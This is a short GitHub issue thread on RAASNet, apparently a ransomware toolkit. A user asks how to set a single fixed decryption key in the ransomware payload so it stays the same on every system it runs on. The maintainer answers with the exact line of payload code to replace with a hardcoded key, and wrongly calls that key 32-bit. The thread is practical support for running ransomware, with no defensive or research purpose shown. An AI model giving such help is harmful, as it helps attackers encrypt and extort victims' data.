### ISSUE TITLE
how to set only one key for decreapt file 

### ISSUE THREAD

**Issue by gohilinfotech** [leonv024/RAASNet#47]
don't want to change decript key on everytime payload run on any system. also your onion link not work sometime, so any another way to set our personal key on payload file ?

**Comment by gohilinfotech** [comment]
also your onion link not work sometime, so any another way to set our personal key on payload file ?

**Comment by leonv024** [comment]
Edit the payload.

Change:
`key = hashlib.md5(gen_string().encode('utf-8')).hexdigest()`

to

`key = '12345678901234567890123456789012'.encode('utf-8')`

Note that this is a 32-bit key.
